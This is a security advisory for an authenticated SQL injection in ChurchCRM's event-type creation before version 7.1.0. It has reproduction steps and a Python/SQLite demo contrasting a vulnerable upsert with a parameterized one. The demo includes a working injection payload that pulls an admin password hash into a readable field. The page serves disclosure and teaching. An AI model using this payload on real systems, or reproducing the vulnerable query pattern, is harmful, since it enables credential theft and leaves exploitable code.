ChurchCRM SQL Injection Vulnerability in Event Type Creation

Vulnerability

A SQL injection vulnerability exists in ChurchCRM versions prior to 7.1.0, in the EventNames.php file. An authenticated user holding the AddEvent privilege can inject SQL through the newEvtTypeCntLst parameter when creating an event type. The root cause is that the unescaped user input is interpolated directly into an SQL query that uses the ON DUPLICATE KEY UPDATE clause, so the attacker controls part of the query text rather than just a value. Manipulation of the executed SQL is confirmed; this opens the door to timing-based (blind) exploitation and, depending on the database configuration, to extraction of sensitive information.

Impact

Exploitation yields authenticated SQL injection: manipulation of the executed SQL queries is confirmed, and timing-based attacks are possible. Depending on the database mode and the payload used, data confidentiality and integrity may be affected further.

Reproduction

To reproduce this vulnerability, log in as a user with the AddEvent privilege (if the test account does not already hold it, assign the privilege first), open the EventNames.php page, and create a new event type with an SQL payload in the newEvtTypeCntLst parameter. When the event type is saved, the injected SQL is executed, demonstrating the vulnerability. Because the affected query uses ON DUPLICATE KEY UPDATE, saving an event type whose name already exists exercises the update branch of the statement in addition to the insert.
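The query-construction flaw described under Vulnerability, and the create-then-resave sequence described above, shown as an added example that is not ChurchCRM's own code. It is written in Python against an in-memory SQLite database so it runs offline; SQLite's ON CONFLICT ... DO UPDATE stands in for MySQL's ON DUPLICATE KEY UPDATE, and the table names, column names, user row and payload are all constructed for the demonstration and are not the project's real schema. The SQLite build must support UPSERT (SQLite 3.24 or later, which every current Python bundles). SQLite has no SLEEP(), so the timing-based vector is not shown; the example instead shows the attacker using the duplicate-key update branch to copy a value from another table into a column they can later read.

```python
import sqlite3

# Constructed stand-in schema. The real ChurchCRM table and column names are
# not reproduced here; these names are assumptions made for the demonstration.
SCHEMA = """
CREATE TABLE event_types (
    evt_id       INTEGER PRIMARY KEY,
    evt_name     TEXT NOT NULL UNIQUE,
    evt_cnt_list TEXT NOT NULL
);
CREATE TABLE users (
    usr_id        INTEGER PRIMARY KEY,
    usr_name      TEXT NOT NULL,
    password_hash TEXT NOT NULL
);
INSERT INTO users VALUES (1, 'admin', 'sha256$constructed-admin-hash');
"""


def fresh_db() -> sqlite3.Connection:
    """In-memory database seeded with the constructed schema above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def save_event_type_vulnerable(conn: sqlite3.Connection, name: str, cnt_list: str) -> None:
    """Vulnerable pattern: request values interpolated straight into the upsert.

    SQLite's ON CONFLICT ... DO UPDATE is used as the equivalent of MySQL's
    ON DUPLICATE KEY UPDATE. The statement is built on a single line, so a
    '--' inside the payload comments out everything after it.
    """
    sql = (
        "INSERT INTO event_types (evt_name, evt_cnt_list) "
        f"VALUES ('{name}', '{cnt_list}') "
        f"ON CONFLICT(evt_name) DO UPDATE SET evt_cnt_list = '{cnt_list}'"
    )
    conn.execute(sql)
    conn.commit()


def save_event_type_safe(conn: sqlite3.Connection, name: str, cnt_list: str) -> None:
    """Fixed pattern: the same upsert with bound parameters, so input is data, never SQL."""
    sql = (
        "INSERT INTO event_types (evt_name, evt_cnt_list) VALUES (?, ?) "
        "ON CONFLICT(evt_name) DO UPDATE SET evt_cnt_list = ?"
    )
    conn.execute(sql, (name, cnt_list, cnt_list))
    conn.commit()


def read_cnt_list(conn: sqlite3.Connection, name: str) -> str:
    """What anyone who can list event types later sees for this type."""
    row = conn.execute(
        "SELECT evt_cnt_list FROM event_types WHERE evt_name = ?", (name,)
    ).fetchone()
    return row[0]


# Constructed payload for the count-list field. It closes the VALUES tuple,
# supplies its own DO UPDATE branch that copies a value from another table
# into the event type's own column, and comments out the rest of the
# original statement.
PAYLOAD = (
    "x') ON CONFLICT(evt_name) DO UPDATE SET evt_cnt_list = "
    "(SELECT password_hash FROM users WHERE usr_id = 1) -- "
)


def demo(save) -> str:
    """Create an event type normally, then re-save the same name with the
    payload so the duplicate-key branch runs. Returns what ends up stored."""
    conn = fresh_db()
    save(conn, "Sunday Service", "1,2,3")   # first save: legitimate INSERT
    save(conn, "Sunday Service", PAYLOAD)   # second save: hits the update branch
    return read_cnt_list(conn, "Sunday Service")


if __name__ == "__main__":
    print("vulnerable stores:", demo(save_event_type_vulnerable))
    print("fixed stores:     ", demo(save_event_type_safe))
```

With the vulnerable function the second save overwrites the event type's count list with the admin password hash from the constructed users table, which the attacker then reads back through the normal event-type listing; with the parameterised function the same payload is stored verbatim as an ordinary string. The fix in 7.1.0 is not reproduced here; the safe variant only illustrates the bound-parameter pattern that removes this class of bug.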

Remediation

Users should update to ChurchCRM version 7.1.0 or later, where this vulnerability has been fixed.

Added: Apr 7, 2026, 8:25 PM
Updated: Apr 7, 2026, 8:25 PM

Vulnerability Rating

Custom Algorithm
spread: 1.9
impact: 3.1
exploitability: 6.6
remediation: 7.7
relevance: 5.4
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.